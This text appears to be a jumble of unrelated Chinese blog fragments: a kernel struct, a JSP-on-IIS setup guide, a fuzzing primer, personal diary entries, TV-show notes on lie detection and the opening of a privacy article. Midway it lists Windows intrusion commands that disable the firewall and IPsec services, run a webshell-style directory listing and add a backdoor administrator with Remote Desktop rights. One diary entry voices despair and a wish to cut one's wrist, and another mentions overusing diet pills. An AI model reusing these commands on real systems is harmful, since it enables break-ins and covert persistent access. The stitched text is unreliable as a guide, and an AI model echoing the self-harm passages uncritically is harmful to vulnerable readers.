typedef struct _REPROTECT_CONTEXT
{
PMDL   Mdl;
PUCHAR LockedVa;
} REPROTECT_CONTEXT, * PREPROTECT_CONTEXT;

在IIS中实现JSP
IIS本身是不可以支持JSP页面的，但是随着JAVA技术的广泛应用，越来越多的网站采用JAVA技术编写程序，我们根据一些资料和自己的实践经验总结了以下两种JAVA应用服务器与IIS的结合的方法，介绍给大家！
IIS+jrun的配置
需要环境及软件：
JDK1.3（JDK1.4）、JRUN3.0+SP2（JRUN4.0）、FREETDS_jdbc驱动（freetds_jdbc.jar文件，放在jrun安装目录下的lib/ext下）。

安装设置：
1、JDK和JRUN均默认安装。FREETDS放入JRUN的LIB/EXT/中。
2、建立新的JAVA应用服务器：
⑴、进入JRUN的SERVERS文件夹下，建立一个新文件夹（如：xiangqing)。将default文件夹中的所有文件复制到此文件夹中。
⑵、用任意文本编辑器打开local.properties，编辑其中的以下六个端口号，将他们改为没有任何进程使用的端口
control.endpoint.main.port
jcp.endpoint.main.port
web.endpoint.main.port
zeus.endpoint.main.port
ejb.ejipt.classServer.port
ejb.ejipt.homePort
然后修改：
jrun.server.displayname为你起的任意名字，如：xiangqing server
⑶、进入lib目录用任意文本编辑器打开jvms.properties文件，添加一行配置信息。
如：xiangqing=JRUN的安装目录下的\servers\xiangqing
⑷、在jrun的bin目录下建立bat文件，内容参照jrun-default.bat中，注意请将最后的名字改为你新建立的服务名字。如：xiangqing
⑸、运行刚刚新建立的bat文件。

Fuzzing的由来
正像瓦特为了解放人类双手提高生产率而发明蒸气机一样，一些或者某位杰出的黑客在研究漏洞发掘技术的时候发明了Fuzzing技术。可以说这是一种非常快速而有效的发掘技术。Fuzzing技术的思想就是利用“暴力”来实现对目标程序的自动化测试，然后监视检查其最后的结果，如果符合某种情况就认为程序可能存在某种漏洞或者问题。这里的“暴力”并不是说我们通常说得武力，而是说利用不断地向目标程序发送或者传递不同格式的数据来测试目标程序的反应。
为什么选择Fuzzing测试
我们在发现一些溢出漏洞的时候，往往是不断地给目标程序输入不同长度的字符串变量来测试目标程序是不是存在溢出漏洞的。
Fuzzer
Fuzzer就是指用来进行Fuzzing工作的工具。这里所列出的分类只是常见的一些，那些不常见的Fuzzer一般是跟据具体测试的目标程序性质来决定的。下面列出的分类中，很多Fuzzer都已经被一些著名的黑客或者安全公司实现，其效果是得到认可的，如果你要利用Fuzzing来发掘软件漏洞，大可以使用这些著名的Fuzzer工具，它将帮助你实现你想要的目的。
Fuzzing工具的分类
文件型
文件型Fuzzer主要针对有文件作为程序输入的情况下的Fuzzing。
1.对于可读的文件，你可以使用改变其内容的具体数值来进行Fuzzing
2.对于未公布格式的，你可以按照一定规律修改文件格式来进行Fuzzing
网络型

乏味和琐碎的日子里总有那么多的忧愁和不开心，不晓得是从哪里冒出来的，但就总是缠绕着你，不能呼吸。
总对别人说 做人要快乐，要乐观，可唯独自己就做不到。
把那些烦恼都堆积在身体里，压缩压缩再压缩。。直到有承受不住的那天就爆发出来，破坏力似乎可以毁灭一整个星球。
不停的用这种方式伤害自己和身边仅剩的关心自己的人，有时候真觉得自己是个疯子
或许我就适合一个人吧，一个人孤单的行走，继续颓废的生活。
没有目标，没有希望，没有未来，得过且过。。挥霍青春。真是够脑残的。
讨厌长大！讨厌成熟！讨厌这样的自己！
有没有时光机可以让我回去 我想救救那个纯真的自己，不要长大，不要在乎那么多，不要为他人着想，不要这么软弱好吗？！
怎么越活越傻逼了呢
真是所谓岁月的痕迹么。
压抑着的烦恼貌似充满了身体的每一丝空间，真想拿把刀切开手腕看看，里面的装的是血还是忧愁！
学不会快乐是不是？总是假笑是不是？干啥都没意思是不是？没有动力是不是？行尸走肉是不是？
那你他妈的还活着浪费青春干什么！
说着那些大道理，试图去帮助别人，可是却永远救不了自己，只会让关心你得人也不开心，没有意义。
真累。。。

2>&1

reg query “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v portnumber
查看终端确定为3389?
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server 看看fDenyTSConnections的键值是多少?值为0是开,为1是关
netstat -ano 能看到3389开启?
net stop policyagent
net stop sharedaccess

/c dir d:\freehost\weiquanguang\cnhonker*.* /w/o/s

先net stop sharedacess关闭防火，再net stop PolicyAgent关闭筛选

administrator默认被允许，这种情况下，你需将用户同时加入“Remote Desktop Users”组。
net user xxx pppp /add &net localgroup administrators xxx /add
net localgroup administrators xxx /add
net localgroup “Remote Desktop Users” xxx /add 远程桌面用户允许设置。

如果我们每天早上起床的时候在同一个地方用同一个距离用同一个表情为自己拍一张照片.那么…..
那么有很长一段时间你都感觉不出变化.半年.一年.两年.你只会觉得今天眼睛肿了明天发了个豆豆.
然后当你把所有的照片放在一起,放成一本很厚很厚的书.然后哗啦啦地翻过去.
你就会看到像童梦奇缘开篇刘德华的那个景象.
你就那么像翻书一样,刷,刷,刷地老了.

无聊。焦躁。忧虑。恐慌。麻木。死寂。烦恼。
只有一点点和某人在一起的时候才会有的小幸福。

大概是吃减肥药吃多了吧。
感觉身体越来越不好了，总是头晕眼花没力气。
话说，我真的有必要这么死减么。其实不是很胖阿。T,T
真是搞不懂啊搞不懂。
貌似连自己都不了解自己了啊。
肿么办呢。肿么办呢。肿么肿么肿么办呢。

S1E01
1.一般人每十分钟会撒三次谎
2.单边收肩膀，对所说的没信心
3.如果嫌犯的惊吓表情超过一秒，他就是在伪装和撒谎。
4.耸鼻子表示不屑
5.人在撒谎的时候并不会转移视线，而会有更多的眼神交流，来确认听者是否相信自己所说的话。
6.瞳孔放大——愤怒、害怕、性刺激
7.在叙述中不直呼其名，而以“那个人”指代某人通常是厌恶、羞愧以至于试图隐瞒某些真相的表现。
8.谎话可以顺着说，但倒过来说很难
9.假装微笑的时候眼角不会有皱纹
10.微笑眨眼是真情流露的表现。虚情假意的微笑时，人们不会眨眼。
11.当人恐惧时，血液从手臂流向腿部，这样为逃跑做好准备，手会先冷下来。
12.提问者眼眉上抬表示他其实完全知道问题的答案。
13.低头并以手加额是极度羞愧的表现。

身份窃取已经成为犯罪的老黄历了。攻击者们已经不再满足于把个人当作目标，现在他们看上了更具价值的东西，即你的客户的数据。

当涉及保护网络时，IT专业人员们通常将目光投向技术。我们堆叠的技术层面越多，每个层面越多样化，我们就认为网络一定更安全。但是，企业往往都失败了，因为他们忽视了内部安全。这并不意味着企业在仔细审阅安全策略和维护企业自身安全方面的失败（尽管作为IT医生的我们往往把病人们的情况弄得更糟糕）。更确切地说，企业是忽视了那些委托我们保护他们系统的人——用户。

网络的物理加固很容易被一个看似简单、却是多方面的元素——人——所规避。成功的攻击者经常扮演着社会学工程师的角色，通过操纵网络上的用户间接地攻击经过加固防护的网络。由于这个常见而且永远存在的威胁，对于企业来说投入时间和精力去培训、教育和测试这个关键的安全组成是非常重要的。在本文中，我们会讨论实施防范社会工程学培训的最佳方法。

社会工程学培训入阶

EMail: fenggou#80sec.com
Site: http://www.80sec.com
Date: 2011-12-6

[目录]
0×00 前言
0×01 隐私安全初探
0×02 “云”存储隐私风险
0×03 移动终端隐私风险
0×04 隐私威胁对抗
0×05 勺之终极奥义
0×06 结语

当你凝视着深渊，深渊也在凝视着你。 — 尼采

0×00 前言
这篇小文很早就有了想法，但由于自己的种种问题，未能完成，就这最近发生的一些事情，有了整理和反省的决心，决定一鼓作气完成他，给自己，给他人一些借鉴。

自从信息时代的爆发，各种服务扑天盖地袭来，人们越来越接受将自己的一切置于这个庞大、新奇、无所不能的互联网之上，各种服务技术已极快的速度更新换代、更多的生活支持，让人惊奇的同时也让人越来越依赖这个虚拟的世界。老一代的网民也许感触最深，就拿自己来说吧（当然我不是资深网民），email已经不知更新了几代，从最初的SinaMail，到163Mail邮箱再到现在的Gmail；个人信息展现平台，从个人主页，到博客，再到现在的微博；数码设备，从最初的网吧，到自己的第一台PC，到一屋子电脑、本子，再到各种智能化mobile设备；数码生活无时无刻的在改变，变的简单。有本书是这样说的：人类进步的过程，就是越来越不加思考，已最小的代价去做某件事。互联网真的让人进步了吗？在我看来，人类进步的过程倒更像是一个退化的过程。

0×01 隐私安全初探
有点扯远了，回到主题。在互联网让我们“进步”的同时，我们每个人的各种隐私开始逐渐的暴漏在这个平台之上，恐怖的是人们已经越来越信任以及依赖互联网，更恐怖的是我们已经不在可以很好的控制他们。在利益和不正常的目的趋使下，互联网的险恶不亚于现实社会。很多网民也许会认为我言过了，我只是想说，未见到，不代表其未发生，互联网隐私问题上，还是要多多保持唯心的态度，举些例子吧：